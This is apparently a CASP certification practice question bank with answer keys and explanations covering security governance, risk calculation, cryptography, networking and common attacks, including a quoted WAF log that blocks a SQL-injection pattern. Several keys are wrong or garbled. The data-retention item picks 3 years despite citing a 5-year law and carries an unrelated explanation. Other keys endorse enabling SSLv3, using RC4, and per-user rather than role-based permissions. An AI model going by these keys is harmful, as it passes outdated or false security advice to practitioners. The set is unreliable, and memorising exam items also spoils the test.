CASP N6

Which of the following outline goals but do not give any specific ways to accomplish the stated goals? a. rules b. procedures c. policies d. standards

C. Explanation: Policies are broad and provide the foundation for development of standards, baselines, guidelines, and procedures.

Some server products have certain capabilities (such as FTP), but those services may need to be enabled in order to function so that the service is not available to a hacker. What application security principle does this illustrate? a. secure by deployment b. secure by design c. secure by default d. secure by accident

C. Explanation: Secure by default means that without changes, the application is secure. For example, some server products have certain capabilities (such as FTP), but the service has to be enabled. This ensures that the port is not open if it is not being used.

The email administrator has suggested that a technique called SPF should be deployed. What issue does this address? a. spear phishing b. whaling c. email spoofing d. captured messages

C. Explanation: Sender Policy Framework (SPF) is an email validation system that works by using DNS to determine whether an email sent by someone has been sent by a host sanctioned by that domain's administrator. If it can't be validated, it is not delivered to the recipient's box.

During a recent security audit, your organization provided the auditor with an SOA. What was the purpose of this document? a. to identify the controls chosen by an organization and explain how and why the controls are appropriate b. to document the performance levels that are guaranteed c. to document risks d. to prevent the disclosure of confidential information

A. to identify the controls chosen by an organization and explain how and why the controls are appropriate

As your company's security practitioner, you must be concerned about end-to-end solution ownership. You have been asked to develop a policy that will cover any assets that are added to the enterprise. Which areas should you consider? (Choose all the apply.) a. operational activities b. asset disposal c. asset reuse d. maintenance

A, B, C, D. Explanation: You should consider the following activities to develop a policy that will provide end-to-end solution ownership for any assets that are added to the enterprise: operational activities, asset disposal, asset reuse, and maintenance.

Which of the following attacks can be carried out using social media? (Choose all that apply.) a. malware b. phishing c. social engineering d. wardriving

A, B, C. Explanation: Malware, phishing, and social engineering attacks can be carried out using social media. Wardriving attacks cannot.

Several business changes have occurred in your company over the past six months. You must analyze your enterprise's data to ensure that data flows are protected. Which of the following guidelines should you follow? (Choose all that apply.) a. Determine which applications and services access the data. b. Determine where the data is stored. c. Share encryption keys with all users. d. Determine how the data is transmitted.

A, B, D. Explanation: The following analysis steps should occur: 1. Determine which applications and services access the information. 2. Document where the information is stored. 3. Document which security controls protect the stored information. 4. Determine how the information is transmitted. 5. Analyze whether authentication is used when accessing the information. Image If it is, determine whether the authentication information is securely transmitted. Image If it is not, determine whether authentication can be used. 6. Analyze enterprise password policies, including password length, password complexity, and password expiration. 7. Determine whether encryption is used to transmit data. Image If it is, ensure that the level of encryption is appropriate and that the encryption algorithm is adequate. Image If it is not, determine whether encryption can be used. 8. Ensure that the encryption keys are protected.

The following is an example of what type of attack? Click here to view code image Message: Access denied with code 403 (phase 2). Pattern match "\bunion\b.{1,100}?\bselect\b" at ARGS:$id. [data "union all select"] [severity "CRITICAL"] [tag "WEB_ATTACK"] [tag "WASCTC/ WASC-19"] [tag "OWASP_TOP_10/A1"] [tag OWASP_AppSensor/CIE1"] Action: Intercepted (phase 2) Apache-Handler: php5-script a. SQL injection b. improper exception handing c. XSS d. CSRF

A. Explanation: A SQL injection attack inserts, or "injects," a SQL query as the input data from the client to the application. In this case, the attack is identified in the error message, and we can see a reference to the SELECT command as data, which indicates an attempt to inject a command as data.

When using XACML as an access control policy language, which of the following is the entity that is protecting the resource that the subject (a user or an application) is attempting to access? a. PEP b. PDP c. FRR d. RAR

A. Explanation: A policy enforcement point (PEP) is an entity that is protecting the resource that the subject (a user or an application) is attempting to access. When it receives a request from a subject, it creates an XACML request based on the attributes of the subject, the requested action, the resource, and other information.

Which IDS type analyzes traffic and compares it to attack or state patterns that reside within the IDS database? a. signature-based IDS b. protocol anomaly-based IDS c. rule- or heuristic-based IDS d. traffic anomaly-based IDS

A. Explanation: A signature-based IDS uses a database of attack characteristics called signatures. This database must be kept updated to provide protection.

Which single sign-on system is used in both UNIX and Microsoft Active Directory? a. Kerberos b. Shibboleth c. WAYF d. OpenID

A. Explanation: AD uses the same authentication and authorization system used in UNIX: Kerberos. This system authenticates a user once and then, through the use of a ticket system, allows the user to perform all actions and access all resources to which he has been given permission without the need to authenticate again.

You are currently engaged in IT security governance for your organization. You specifically provide instruction on acceptable and unacceptable activities for all personnel. What should you do? a. Create an advisory security policy that addresses all these issues. b. Create an NDA that addresses all these issues. c. Create an informative security policy that addresses all these issues. d. Create a regulatory security policy and system-specific security policy that address all these issues.

A. Explanation: Advisory security policies provide instruction on acceptable and unacceptable activities. Nondisclosure agreements (NDAs) are binding contracts that are signed to ensure that the signer does not divulge confidential information. Informative security policies provide information on certain topics and act as an educational tool. Regulatory security policies address specific industry regulations, including mandatory standards. System-specific security policies address security for a specific computer, network, technology, or application.

Your company has recently decided to switch Internet service providers. The new provider has provided a document that lists all the guaranteed performance levels of the new connection. Which document contains this information? a. SLA b. ISA c. MOU d. IA

A. Explanation: An SLA lists all the guaranteed performance levels of a new connection.

Which attack is the unauthorized access to a device using a Bluetooth connection? a. Bluesnarfing b. Bluejacking c. Bluefishing d. Bluefilling

A. Explanation: Bluesnarfing is the unauthorized access to a device using a Bluetooth connection. In this case, the attacker is trying to access information on the device.

Which statement is not true regarding an organization's database administrator? a. Database administrators should grant permissions based on user roles. b. Database administrators use database views to limit the information to which users have access. c. Database administrators should implement encryption to protect information in cells, tables, and entire databases. d. Database administrators should use auditing so that users' actions are recorded.

A. Explanation: Database administrators should grant permission based on individual user accounts, not roles.

Which of the following tenets has been satisfied when an organization takes all the actions it can reasonably take to prevent security issues or to mitigate damage if security breaches occur? a. due care b. due diligence c. due process d. CIA

A. Explanation: Due care means that an organization takes all the actions it can reasonably take to prevent security issues or to mitigate damage if security breaches occur.

Users on your organization's network need to be able to access several confidential files located on a file server. Currently, the files are encrypted. Recently, it was discovered that attackers were able to change the contents of the file. You need to use a hash function to calculate the hash values of the correct files. Which of the following should you not use? a. ECC b. MD6 c. SHA-2 d. RIPEMD-160

A. Explanation: ECC is not a hash function. It is an asymmetric algorithm. All the other options are hash functions.

Which of the following is a device-tracking technology? a. geolocation b. geotagging c. geofencing d. RFID

A. Explanation: Geolocation is a device-tracking technology.

Which of the following runs directly on the host's hardware to control the hardware and to manage guest operating systems? a. Type I hypervisor b. Type II hypervisor c. Type III hypervisor d. Type IV hypervisor

A. Explanation: Hypervisors can be either Type I or Type II. A Type I hypervisor (or native, bare metal) is one that runs directly on the host's hardware to control the hardware and to manage guest operating systems. A guest operating system thus runs on another level above the hypervisor.

Which of the following testing types would you use if you wanted to spend the least amount of time on the test? a. black box b. gray box c. white box d. clear box

A. Explanation: In black-box testing, or zero-knowledge testing, the team is provided with no knowledge regarding the organization's network. This type of testing is the least time-consuming.

While performing risk analysis, your team has come up with a list of many risks. Several of the risks are unavoidable, even though you plan to implement some security controls to protect against them. Which type of risk is considered unavoidable? a. inherent risks b. residual risks c. technical risks d. operational risks

A. Explanation: Inherent risks are risks that are unavoidable. You should still implement security controls to protect against them. Residual risk is the level of risk remaining after the safeguards or controls have been implemented. Technical and operational are two types of threat agents, not types of risks.

What behavior occurs when an arithmetic operation attempts to create a numeric value that is too large to be represented within the available storage space? a. integer overflow b. buffer overflow c. race condition d. memory leak

A. Explanation: Integer overflow occurs when an arithmetic operation attempts to create a numeric value that is too large to be represented within the available storage space. For instance, adding 1 to the largest value that can be represented constitutes an integer overflow. The register width of a processor determines the range of values that can be represented.

Your organization's enterprise implements several different encryption algorithms, based on the organizational needs and the data being protected. Recently, several different encryption keys have generated the same ciphertext from the same plaintext message. This has resulted in your organization's enterprise being susceptible to attackers. Which condition has occurred? a. key clustering b. cryptanalysis c. keyspace d. confusion

A. Explanation: Key clustering occurs when different encryption keys generate the same ciphertext from the same plaintext message. Cryptanalysis is the science of decrypting ciphertext without prior knowledge of the key or cryptosystem used. A keyspace is all the possible key values when using a particular algorithm or other security measure. Confusion is the process of changing a key value during each round of encryption.

Your organization is planning the deployment of a new remote assistance tool. The security team is trying to determine the level of encryption the selected product must support. Which of the following factors should be the most important consideration? a. the type required by industry regulations b. the strongest available c. the opinion of the third-party vendor d. the level supported by the desktops

A. Explanation: Many products implement proprietary encryption, but in regulated industries this type of encryption may not be legal. Always use the level of encryption required by your industry, such as Advanced Encryption Standard (AES).

The following is an example of what type of rule set? Click here to view code image iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP iptables -A INPUT -i eth1 -s 172. -j DROP a. iptables b. ipchains c. ipconfig d. ipcmp

A. Explanation: On Linux-based systems, a common host-based firewall is iptables, which replaces a previous package called ipchains. It has the ability to accept or drop packets.

You have recently suffered some network attacks and would like to discover the services that are available on the computers in your network. Which of the following assessment tools would be most appropriate for this? a. port scanner b. protocol analyzer c. password cracker d. fuzzer

A. Explanation: Port scanners can be used to scan a network for open ports. Open ports indicate services that may be running and listening on a device that may be susceptible to being used for an attack. These tools basically ping every address and port number combination and keep track of which ports are open on each device as the pings are answered by open ports with listening services and not answered by closed ports.

Which of the following is not a command-line utility? a. RDP b. Telnet c. SSH d. NAT

A. Explanation: Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft that provides a graphical interface to connect to another computer over a network connection. Unlike using Telnet or SSH, which allow only work at the command line, RDP enables you to work on the computer as if you were at its console.

Which organization issues RFCs? a. IETF b. IEEE c. ISO d. IEC

A. Explanation: The IETF issues RFCs.

During a recent data breach at your organization, a forensic expert was brought in to ensure that the evidence was retained in a proper manner. The forensic expert stressed the need to ensure the chain of custody. Which of the following components is not part of the chain of custody? a. who detected the evidence b. who controlled the evidence c. who secured the evidence d. who obtained the evidence

A. Explanation: The chain of custody is not concerned with who detected the evidence. The chain of custody shows who controlled the evidence, who secured the evidence, and who obtained the evidence.

During a discussion of biometric technologies, one of your coworkers raises a concern that valid users will be falsely rejected by the system. What type of error is he describing? a. FRR b. FAR c. CER d. accuracy

A. Explanation: The false rejection rate (FRR) is a measurement of valid users that will be falsely rejected by the system. This is called a Type I error.

The chief security officer wants to know the most popular biometric methods, ranked by user acceptance. Which of the following is the most popular biometric method ranked by user acceptance? a. voice pattern b. keystroke pattern c. iris scan d. retina scan

A. Explanation: The following is a list of the most popular biometric methods ranked by user acceptance, starting with the methods that are most popular: 1. Voice pattern 2. Keystroke pattern 3. Signature dynamics 4. Hand geometry 5. Hand print 6. Fingerprint 7. Iris scan 8. Retina scan

Your organization has decided to convert two rarely used conference rooms into a secure data center. This new data center will house all servers and databases. Access to the data center will be controlled using biometrics. CCTV will be deployed to monitor all access to the data center. Which staff members should be involved in the data center design and deployment? a. database administrator, network administrator, facilities manager, physical security manager, and management b. database administrator, programmer, facilities manager, physical security manager, and management c. database administrator, network administrator, facilities manager, physical security manager, and programmer d. database administrator, network administrator, programmer, physical security manager, and management

A. Explanation: The following people should be involved in the data center design and deployment: database administrator, network administrator, facilities manager, physical security manager, and management.

What is the last step of a BIA? a. Identify recovery priorities. b. Identify resource requirements. c. Identify outage impacts and estimate downtime. d. Identify critical processes and resources.

A. Explanation: The four main steps of the BIA are as follows: 1. Identify critical processes and resources. 2. Identify outage impacts and estimate downtime. 3. Identify resource requirements. 4. Identify recovery priorities.

Your company has recently been the victim of a prolonged password attack in which attackers used a dictionary attack to determine user passwords. After this occurred, attackers were able to access your network and download confidential information. Your organization only found out about the breach when the attackers requested monetary compensation for keeping the information confidential. Later, it was determined that your audit logs recorded many suspicious events over a period of several weeks. What was the most likely reason that this attack was successful? a. No one was reviewing the audit logs. b. The audit logs generated too many false negatives. c. The audit logs generated too many false positives. d. The attack occurred outside normal operation hours.

A. Explanation: The most likely reason that this attack was successful was that no one was reviewing the audit logs.

Your organization has recently hired a new chief security officer (CSO). One of his first efforts is to implement a network trends collection policy. Which statement best defines the purpose of this policy? a. to anticipate where and when defenses might need to be changed b. to determine the security thresholds c. to determine the benefits of implementing security controls d. to test security controls that you want to deploy

A. Explanation: The purpose of a network trends collection policy is to collect trends that will allow you to anticipate where and when defenses might need to be changed.

Your organization is in the process of upgrading the hardware in several servers. You need to ensure that you have captured the appropriate metrics. Which step should you take? a. Capture benchmarks for all the upgraded servers. Compare these benchmarks to the old baselines. Replace the old baselines using the new benchmarks for any values that have changed. b. Capture baselines for all the upgraded servers. Compare these baselines to the old benchmarks. Replace the old benchmarks using the new baselines for any values that have changed. c. Capture benchmarks for all the upgraded servers. Compare these benchmarks to the old thresholds. Replace the old thresholds using the new benchmarks for any values that have changed. d. Capture baselines for all the upgraded servers. Compare these baselines to the old thresholds. Replace the old thresholds using the new baselines for any values that have changed.

A. Explanation: You should capture benchmarks for all upgraded servers, compare those benchmarks to the old baselines, and replace the old baselines using the new benchmarks for any values that have changes. Benchmarks should always be compared to baselines. Baselines should be updated if changes made to a system can improve the system's performance.

Your organization must comply with several industry and governmental standards to protect private and confidential information. You must analyze which standards to implement. Which standards should you consider? a. open standards, de facto standards, and de jure standards b. open standards only c. de facto standards only d. de jure standards only

A. Explanation: You should consider open standards, de facto standards, and de jure standards.

Recently, you created several security benchmarks and compared them to your security baselines. Then you performed a trend analysis and determined that several new security controls need to be deployed. After testing the new security control, you decided to implement only two of the proposed controls. Once the security controls were deployed, you analyzed the controls to ensure that the business needs were met. What should you do now? a. Create a lessons-learned report. b. Perform a cost/benefit analysis. c. Determine ROI on the new controls. d. Determine the TCO on the new controls.

A. Explanation: You should create a lessons-learned report. All of the other options should be performed before deployment.

As your enterprise has grown, it has become increasingly hard to access and manage resources. Users often have trouble locating printers, servers, and other resources. You have been asked to deploy a solution that will allow easy access to internal resources. Which solution should you deploy? a. Directory Services b. CMDB c. ESB d. SOA

A. Explanation: You should deploy Directory Services to allow easy access internal resources.

Your organization has recently partnered with another organization. The partner organization needs access to certain resources. Management wants you to create a perimeter network that contains only the resources that the partner organization needs to access. What should you do? a. Deploy a DMZ. b. Deploy a VLAN. c. Deploy a wireless network. d. Deploy a VPN.

A. Explanation: You should deploy a demilitarized zone (DMZ) that will contain only the resources that the partner organization needs to access.

A development team has recently completed the deployment of a new learning management system (LMS) that will replace the current legacy system. The team successfully deploys the new LMS, and it is fully functional. Users are satisfied with the new system. What stage of the SDLC should you implement for the old system? a. Dispose b. Operate/maintain c. Initiate d. Acquire/develop

A. Explanation: You should now implement the disposal stage of the SDLC for the old system.

Which of the following is not a measure that should be taken when using data warehousing applications? a. Allow metadata to be used interactively. b. Control metadata from being used interactively. c. Monitor the data purging plan. d. Reconcile data moved between the operations environment and the data warehouse.

A. Explanation: You should prevent metadata from being used interactively.

Item type: Multiple Choice Question: Your company completes a risk analysis. After the analysis, management requests that you deploy security controls that will mitigate any of the identified risks. Management indicates that there is an expected level of residual risk that they expect. What is residual risk? Options: A. risk that is left over after safeguards have been implemented B. terminating the activity that causes a risk or choosing an alternative that is not as risky C. passing the risk on to a third party D. defining the acceptable risk level the organization can tolerate and reducing the risk to that level

Answer: A Explanation: Residual risk is risk that is left over after safeguards have been implemented.

A security audit has uncovered that some of the encryption keys used to secure your organization's business-to-business (B2B) private data exchange transactions with its partners are too weak. The security administrator needs to implement a process to ensure that private data exchange transactions will not be compromised if a weak encryption key is found. Which should the security administrator do? Options: A. Implement PFS on all VPN tunnels. B. Implement PFS on all SSH connections. C. Implement HMAC on all VPN tunnels. D. Implement HMAC on all SSH connections.

Answer: A Explanation: You should implement perfect forward secrecy (PFS) on all VPN tunnels to ensure that private data exchange transactions will not be compromised if a weak encryption key is found. PFS ensures that a session key derived from a set of long-term keys cannot be compromised if one of the long-term keys is compromised in the future. PFS should be implemented over a VPN tunnel for the partner connections, not over SSH connections. Secure Shell (SSH) allows secure connection to internal resources from remote locations.

Item type: Multiple Choice Question: Your company is negotiating with a new service provider for its Internet services. You have been asked to draft a service-level agreement (SLA) that stipulates the required levels of service for this company. The SLA must provide the appropriate levels of service that will ensure that your company's departmental SLAs are met. What should you use to develop the draft SLA? Options: A. OLA B. NDA C. MOU D. ISA

Answer: A Explanation: You should use the operating-level agreement (OLA) to develop the draft SLA. You need to ensure that your company's departmental SLAs are met. These are defined in an OLA.

Item type: Multiple Choice Question: Several of your organization's users have requested permission to install certificates from a third party. Company policy states that before users can install these certificates, you must verify that the certificates are still valid. You need to check for revocation. What could you check to verify this information? (Choose all that apply.) Options: A. CRL B. OCSP C. DNSSEC D. DRMItem

Answer: A, B Explanation: You can use either a certificate revocation list (CRL) or Online Certificate Status Protocol (OCSP) to check for certificate revocation, depending on which type of PKI is deployed.

Item type: Multiple Choice Question: Your organization has recently implemented several new security policies in response to a recent risk analysis. One of the new policies states that controls must be configured to protect files from unauthorized or accidental deletion. Which aspect of security does this new policy address? Options: A. confidentiality B. integrity C. availability D. authorization

Answer: B Explanation: Configuring controls that will protect files from unauthorized or accidental deletion addresses data integrity.

Item type: Multiple Choice Question: Your company has an intrusion detection system (IDS) and firewall deployed on the perimeter of the network to detect attacks against internal resources. Yesterday, the IDS alerted you that SSL sessions are under attack, using an older exploit against SSLv2. Your organization's web server must use encryption for all financial transactions. You need to prevent such an attack from being successful in the future. What should you do? Options: A. Block SSLv2 on the firewall. B. Block SSLv2 on the web server. C. Disable SSLv2 and enable SSLv3 on the web server. D. Update the web server with the latest patches and updates.

Answer: C Explanation: You should disable SSLv2 and enable SSLv3 on the web server. This will prevent the use of SSLv2, which is the problem.

Item type: Multiple Choice Question: Your company has recently decided to merge with another company. Each company has its own Internet PKI that deploys certificates to users within that network. You have been asked to deploy a solution that allows each company to trust the other's certificates. What should you do? Options: A. Issue a policy certificate accepting both trust paths. B. Deploy a new PKI for all users and import the current user certificates to the new PKI. C. Use a cross-certification certificate. D. Add the root certificate to both of the root certification authorities (CAs).

Answer: C Explanation: You should use a cross-certification certificate to ensure that each company trusts the other company's certificates.

Item type: Multiple Choice Question: The research department for your company needs to carry out a web conference with a third party. The manager of the research department has requested that you ensure that the web conference is encrypted because of the sensitive nature of the topic that will be discussed. Which of the following should you deploy? Options: A. SSL B. SET C. IPsec D. RC4

Answer: D Explanation: RC4 is a stream-based cipher and could be used to encrypt web conference traffic.

Item type: Multiple Choice Question: Your company completes a risk analysis. After the analysis, management requests that you deploy security controls that will mitigate any of the identified risks. What is risk mitigation? Options: A. risk that is left over after safeguards have been implemented B. terminating the activity that causes a risk or choosing an alternative that is not as risky C. passing the risk on to a third party D. defining the acceptable risk level the organization can tolerate and reducing the risk to that level

Answer: D Explanation: Risk mitigation is defining the acceptable risk level the organization can tolerate and reducing the risk to that level.

Item type: Multiple Choice Question: Your company has a single, centralized web-based retail sales system. Orders come in 12 hours per day, 364 days per year. Sales average $500,000 per day. Attacks against the retail sales system occur on a daily basis. For the retail sales system, there is a 1% chance of a hacker bringing the system down. The mean time to restore the system is 6 hours. What is the ALE for this system? Options: A. $912,500 B. $250,000 C. $500,000 D. $910,000

Answer: D Explanation: The annualized loss expectancy (ALE) for the system is $910,000. The asset value (AV) is $500,000. The exposure factor (EF) is 0.5 (6 hours/12 hours). Single loss expectancy (SLE) = AV × EF = $500,000 × 0.5 = $250,000 Annualized rate of occurrence (ARO) = 0.01 × 364 = 3.64 Annualized loss expectancy (ALE) = SLE × ARO = $250,000 × 3.64 = $910,000

You have been hired as a security analyst for your organization. As your first job duties, you have been asked to identify new technical controls that should be implemented by your organization. Which of the following controls should you identify? (Choose all that apply.) a. personnel procedures b. authentication c. firewalls d. badges

B, C. Explanation: Authentication and firewalls are technical controls. Logical or technical controls are software or hardware components used to restrict access.

What type of chip makes full drive encryption possible? a. out-of-band b. TPM c. clipper d. sealed

B. Explanation: A Trusted Platform Module (TPM) chip is a security chip installed on a computer's motherboard that is responsible for managing symmetric and asymmetric keys, hashes, and digital certificates. This chip provides services to protect passwords, encrypt drives, and manage digital rights, making it much harder for attackers to gain access to computers that have a TPM chip enabled.

You are formulating the data retention policies for your organization. Senior management is concerned that the data storage capabilities of your organization will be exceeded and has asked you to implement a data retention policy of 180 days or less. Middle management is concerned that data will need to be accessed beyond this time limit and has requested data retention of at least 1 year. During your research, you discover a state regulation that requires a data retention period of 3 years and a federal law that requires a data retention period of 5 years. Which data retention policy should you implement? a. 5 years b. 3 years c. 1 year d. 180 days

B. Explanation: A data custodian should be responsible for implementing the controls.

Your organization is trying to decide whether to implement a private cloud or use a public cloud. Which of the following is a valid reason for choosing a private cloud? a. Attackers and disgruntled employees are unsure of where the data actually resides. b. It will ensure that the data is owned by your organization. c. The cloud vendor will provide security expertise and must maintain the level of service detailed in the contract.

B. Explanation: A private cloud will ensure that the data is owned by your organization. All the other options are reasons for choosing a public cloud.

Which document requires that a vendor reply with a formal bid proposal? a. RFI b. RFP c. RFQ d. agreement

B. Explanation: A request for proposal (RFP) requires that a vendor reply with a formal bid proposal.

What documents the security requirements that a new asset must meet? a. SDLC b. SRTM c. SSDLC d. RFID

B. Explanation: A security requirements traceability matrix (SRTM) documents the security requirements that a new asset must meet.

You have been asked to join the development team at your organization to provide guidance on security controls. During the first meeting, you discover that the development team does not fully understand the SDLC. During which phase of this life cycle is the system actually deployed? a. Acquire/develop b. Implement c. Initiate d. Operate/maintain

B. Explanation: A system is actually deployed during the implementation stage of the SDLC. The steps in the SDLC are as follows: 1. Initiate 2. Acquire/develop 3. Implement 4. Operate/maintain 5. Dispose

Your organization has been working to formally document all of its third-party agreements. Management contacts you, requesting that you provide access to a document that spells out the exact security measures that should be taken with respect to the handling of data exchanged between your organization and a third party. Which of the following documents should you provide? a. BYOD b. TCA c. ISO d. SOE

B. Explanation: A third-party connection agreement (TCA) is a document that spells out the exact security measures that should be taken with respect to the handling of data exchanged between the parties. This is a document that should be executed in any instance where a partnership involves depending on another entity to secure company data.

Which organization first brought forward the idea of a trusted operating system (TOS)? a. IEEE b. TCSEC c. INTERNIC d. IANA

B. Explanation: A trusted operating system (TOS) generally refers to an operating system that provides sufficient support for multilevel security and evidence of correctness to meet a particular set of government requirements. This goal was first brought forward by an organization called TCSEC.

Which of the following applies rule sets to an HTTP conversation? a. HSM b. WAF c. SIEM d. NIPS

B. Explanation: A web application firewall applies rule sets to an HTTP conversation. These sets cover common attack types to which these session types are susceptible.

Which of the following is not a safe computing practice? a. Perform daily scans. b. Enable autorun. c. Don't click on email links or attachments. d. Keep antimalware applications current.

B. Explanation: Autorun should be disabled.

Your organization has recently experienced issues with data storage. The servers you currently use do not provide adequate storage. After researching the issues and the options available, you decide that data storage needs for your organization will grow exponentially over the new couple years. However, within three years, data storage needs will return to the current demand. Management wants to implement a solution that will provide for the current and future needs without investing in hardware that will no longer be needed in the future. Which recommendation should you make? a. Deploy virtual servers on the existing machines. b. Contract with a public cloud service provider. c. Deploy a private cloud service. d. Deploy a community cloud service.

B. Explanation: Because management wants a solution without investing in hardware that will no longer be needed in the future, you should contract with a public cloud service provider.

You would like to prevent the corruption of the routing tables in your network. Which of the following would be the best approach to mitigate this? a. Implement CDP. b. Configure CHAP between routers. c. Implement sandboxing. d. Disable CDP.

B. Explanation: By configuring authentication, you can prevent routing updates with rogue routers.

A hacker gains access to your organization's network. During this attack, he is able to change some data and access some design plans that are protected by a U.S. patent. Which security tenets have been violated? a. confidentiality and availability b. confidentiality and integrity c. integrity and availability d. confidentiality, integrity, and availability

B. Explanation: Confidentiality and integrity have been violated. Changing the data violates integrity, and accessing patented design plans violates confidentiality. Availability is not violated in this scenario.

You have been hired as a security analyst for your organization. As your first job duties, you have been asked to identify new administrative controls that should be implemented by your organization. Which of the following controls should you identify? (Choose all that apply.) a. departmental security policies b. security awareness training c. data backups d. auditing

B. Explanation: Departmental security policies and security awareness training are administrative controls. Administrative or management controls are implemented to administer the organization's assets and personnel and include security policies, procedures, standards, baselines, and guidelines that are established by management.

Which of the following refers to responsibilities that an organization has due to partnerships with other organizations and customers? a. due process b. downstream liability c. due diligence d. indirect costs

B. Explanation: Downstream liability refers to liability that an organization accrues due to partnerships with other organizations and customers.

FCoE encapsulates Fiber Channel traffic in what type of packet or frame? a. TCP IP b. Ethernet c. IP d. ARP

B. Explanation: Fiber Channel over Ethernet (FCoE) encapsulates Fiber Channel traffic within Ethernet frames much as iSCSI encapsulates SCSI commands in IP packets.

Which testing method injects invalid or unexpected input into an application to test how the application reacts? a. MAC spoofing b. fuzzing c. white box d. SQL injection

B. Explanation: Fuzz testing, or fuzzing, injects invalid or unexpected input (sometimes called faults) into an application to test how the application reacts. It is usually done with a software tool that automates the process.

A group of your software developers just reviewed code while the author explained his reasoning. What type of code review have they just completed? a. pair programming b. over-the-shoulder c. tool assisted d. email

B. Explanation: In over-the-shoulder code review, coworkers review the code while the author explains his reasoning.

What design measure is the solution to most XSS and CSRF attacks? a. iptables b. input validation c. tripwire d. ACLs

B. Explanation: Input validation is the process of checking all input for things such as proper format and proper length.

Which of the following is used to manage a device using Telnet? a. data interface b. management interface c. USB d. Bluetooth

B. Explanation: Management interfaces are used for accessing a device remotely. Typically, a management interface is disconnected from the in-band network and is connected to the device's internal network. Through a management interface, you can access the device over the network by using utilities such as SSH and Telnet. SNMP can use the management interface to gather statistics from the device.

What CIA principle is satisfied when using multipathing? a. confidentiality b. availability c. integrity d. non-repudiation

B. Explanation: Multipathing is simply the use of multiple physical or virtual network paths to the storage device. This can provide both network fault tolerance and increased performance. It therefore satisfies the availability requirement of CIA.

You would like to prevent users from using the same password again when it is time to change their password. What policy do you need to implement? a. password life b. password history c. password complexity d. authentication period

B. Explanation: Password history controls how long before a password can be reused. Password policies usually remember a certain number of previously used passwords.

You are the security analyst for your enterprise. You have been asked to analyze the efficiency of the security controls implemented on the enterprise. Which attribute will you be analyzing? a. latency b. performance c. scalability d. capability

B. Explanation: Performance is the manner in which or the efficiency with which a device or technology reacts or fulfills its intended purpose.

Placing older data on low-cost, low-performance storage while keeping more active data on faster storage systems is called what? a. multipathing b. tiering c. consolidating d. masking

B. Explanation: Placing older data on low-cost, low-performance storage while keeping more active data on faster storage systems is sometimes called tiering.

Recently someone stole data from your network, and that data should have been encrypted, but it's too late to figure out whether it was. What tool could you use to determine if certain types of traffic on your network are encrypted? a. port scanner b. protocol analyzer c. password cracker d. fuzzer

B. Explanation: Protocol analyzers, or sniffers, collect raw packets from the network and are used by both legitimate security professionals and attackers. Using such a tool, you could tell if the traffic of interest is encrypted.

After analyzing the risks to your company's web server, company management decides to implement different safeguards for each risk. For several risks, management chooses to avoid the risk. What do you need to do for these risks? a. Determine how much risk is left over after safeguards have been implemented. b. Terminate the activity that causes the risks or choose an alternative that is not as risky. c. Pass the risk on to a third party. d. Define the acceptable risk level the organization can tolerate and reduce the risks to that level.

B. Explanation: Risk avoidance involves terminating the activity that causes a risk or choosing an alternative that is not as risky. Residual risk is risk that is left over after safeguards have been implemented. Risk transfer is passing the risk on to a third party. Risk mitigation is defining the acceptable risk level the organization can tolerate and reducing the risk to that level.

What type of traffic is the SIMPLE protocol designed to secure? a. IM b. presence c. video conference d. email

B. Explanation: Session Initiation Protocol for Instant Messaging and Presence Leveraging Extensions (SIMPLE) is deigned to secure presence traffic.

Situational awareness is being aware of the _________ in which a system operates at ________. a. time; a certain performance level b. environment; a certain point in time c. environment; a certain performance level d. time; its maximum level

B. Explanation: Situational awareness is being aware of the environment in which a system operates at a certain point in time.

Your organization's network has recently started experiencing performance issues. After researching the problem, you discover that collisions have increased over the past couple months at an alarming rate. You need to implement a solution to eliminate the collisions. What should you do? a. Replace all routers with hubs. b. Replace all hubs with switches. c. Replace all firewalls with routers. d. Replace all IPS with IDS.

B. Explanation: Switches improve performance over hubs because they eliminate collisions. Each switch port is in its own collision domain, while all ports of a hub are in the same collision domain.

Which type of replication provides near-real-time replication but uses more bandwidth and cannot tolerate latency? a. asynchronous b. synchronous c. point-in-time d. snapshot

B. Explanation: Synchronous replication provides near-real-time replication but uses more bandwidth and cannot tolerate latency.

You have recently been hired by a company to analyze its security mechanisms to determine any weaknesses in their current security mechanisms. During this analysis, you detect that an application is using a 3DES implementation that encrypts each block of data three times, each time with a different key. Which 3DES implementation does the application use? a. 3DES-EDE3 b. 3DES-EEE3 c. 3DES-EDE2 d. 3DES-EEE2

B. Explanation: The 3DES-EEE3 implementation encrypts each block of data three times, each time with a different key. The 3DES-EDE3 implementation encrypts each block of data with the first key, decrypts each block with the second key, and encrypts each block with the third key. The 3DES-EEE2 implementation encrypts each block of data with the first key, encrypts each block with the second key, and then encrypts each block again with the first key. The 3DES-EDE2 implementation encrypts each block of data with the first key, decrypts each block with the second key, and then encrypts each block with the first key.

Which of the following is a security program development standard on how to develop and maintain an information security management system (ISMS)? a. COBIT b. ISO 27000 c. 802.11 d. 802.1x

B. Explanation: The International Organization for Standardization (ISO), often incorrectly referred to as the International Standards Organization, joined with the International Electrotechnical Commission (IEC) to standardize the British Standard 7799 (BS7799) to a new global standard that is now referred to as the ISO/IEC 27000 series. ISO 27000 is a security program development standard on how to develop and maintain an information security management system (ISMS).

Which organization maintains a list of top 10 attacks on an ongoing basis? a. WASC b. OWASP c. BSI d. ISO

B. Explanation: The Open Web Application Security Project (OWASP) is a group that monitors attacks, specifically web attacks. OWASP maintains a list of top 10 attacks on an ongoing basis. This group also holds regular meetings at chapters throughout the world, providing resources and tools including testing procedures, code review steps, and development guidelines.

Your company is merging with a larger organization. Which of the following is not a responsibility of the due diligence team? a. Create a risk profile for all identified risks involved in moving data. b. Ensure that auditors and the compliance team are using different frameworks. c. Define a plan to set and measure security controls at every step of the process. d. Prioritize processes and identify those that require immediate attention.

B. Explanation: The auditors and the compliance team should be using matching frameworks.

As part of a new security initiative, you have been asked to provide data classifications for all organizational data that is stored on servers. As part of your research, you must interview the data owners. Which staff are most likely to be considered data owners? a. business unit managers and CEO b. business unit managers and CIO c. CIO and CSO d. physical security manager and business unit manager

B. Explanation: The business unit managers and the chief information officer (CIO) are most likely to be considered data owners.

A forensic investigator is collecting evidence related to a recent attack at your organization. You are helping her preserve the evidence for use in the lawsuit that your company plans to bring against the attackers. Which of the following is not one of the five rules of evidence? a. Be accurate. b. Be volatile. c. Be admissible. d. Be convincing.

B. Explanation: The five rules of evidence are as follows: Image Be authentic. Image Be accurate. Image Be complete. Image Be convincing. Image Be admissible.

